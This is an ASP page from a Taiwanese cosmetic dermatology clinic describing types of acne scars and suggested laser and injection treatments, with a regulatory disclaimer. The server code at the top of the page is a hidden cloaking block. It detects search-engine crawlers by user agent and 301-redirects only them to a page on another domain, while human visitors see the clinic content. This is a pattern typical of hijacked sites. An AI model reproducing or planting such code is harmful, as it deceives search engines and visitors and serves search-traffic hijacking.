<% agent=request.servervariables("http_user_agent") if instr(agent,"bot")>0 or instr(agent,"yahoo")>0 or instr(agent,"bing")>0 or instr(agent,"google")>0 then Response.Status="301 Moved Permanently" Response.AddHeader "Location","http://www.ton-yen.com.tw/skin_7.php" end if pageName = "p6" subPageName = "p6_6" %> 痘疤-中壢<%= pageTitle %> >
痘疤 皮膚問題痘疤

好不容易臉上痘痘少了…但形成的痘疤卻也成了讓人苦惱的另一項戰痘工程…



痘疤主要因不當外力擠壓,使毛囊壁破裂,外來接觸可能導致的感染,肌膚組織破壞未得到控制,或是不當的治療方式而產生。疤痕基本分為紅黑凹凸4種,治療方式不一:


黑痘疤
黑痘疤
痘痘發炎後的黑色素沉澱,屬於過渡性的痘疤,會隨著時間慢慢淡化消失。若希望加速淡化時間,建議搭配美白治療,以及加強防曬工作。
治療建議:淨膚雷射纖白光

紅痘疤
紅痘疤

紅痘疤是長痘痘的地方因為細胞發炎引起血管擴張,但是痘痘消下去後血管並沒有馬上縮回去,形成一個個平平紅紅的暫時性紅斑痘疤!一般約4到6個月內會漸漸退去!若半年仍無消退,這時只能靠染料雷射淡化痘疤


治療建議:染料雷射

凹痘疤
凹痘疤
發炎性痘痘最容易產生凹痘疤,主要是因為在修復過程中被疤痕組織所取代。
治療建議:飛梭雷射飛針治療

凸痘疤
凸痘疤
痘疤突出屬於發炎之後纖維化所引起的。先將凸疤打成平疤,讓組織收縮,但還是會有痕跡;若為又凸又紅的痘疤,就得先消平,再進行退紅。
治療建議:去疤針

痘疤

痘疤

痘疤

痘疤


【小提醒】
行政院衛生福利部2013/01/04公告:「『美容醫學』一般係指由專業醫師透過醫學技術,如:手術、藥物、醫療器械、生物科技材料等,執行具侵入性或低侵入性醫療技術來改善身體外觀,而『非以治療疾病為主要目的』」。本宣傳也是由合格醫師透過醫學技術執行具低侵入性醫療技術來「改善」身體外觀,而非以治療疾病為目的,符合上述的公告。
本宣傳依據行政院衛生福利部衛署醫字0990262180號、衛部醫字第1031662939辦理,屬於仿單核准適應症外的使用(Off-label use),執行的醫師應確實告知使用原因及可能造成的風險,並取得其同意始得使用;故本資訊無法取代醫師親自關心您;有關適應症、禁忌症等副作用等問題,醫師將依個案說明。

以上照片經本人同意使用


看到臉上有粉刺痘痘,還是忍不住想去摳一摳、擠一擠嗎?
小心下一秒,就擠出了不可抹滅的痘疤啦!

紅通通的痘疤… 色素黑疤…
月球表面凹疤… 整張臉膚色不均勻,凹凸不平…